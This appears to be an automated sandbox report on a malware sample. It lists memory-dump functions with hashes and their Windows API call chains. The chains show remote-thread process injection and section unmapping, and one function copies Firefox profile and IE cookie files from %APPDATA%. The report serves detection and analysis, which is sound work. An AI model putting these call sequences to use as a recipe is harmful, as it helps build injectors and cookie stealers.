  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
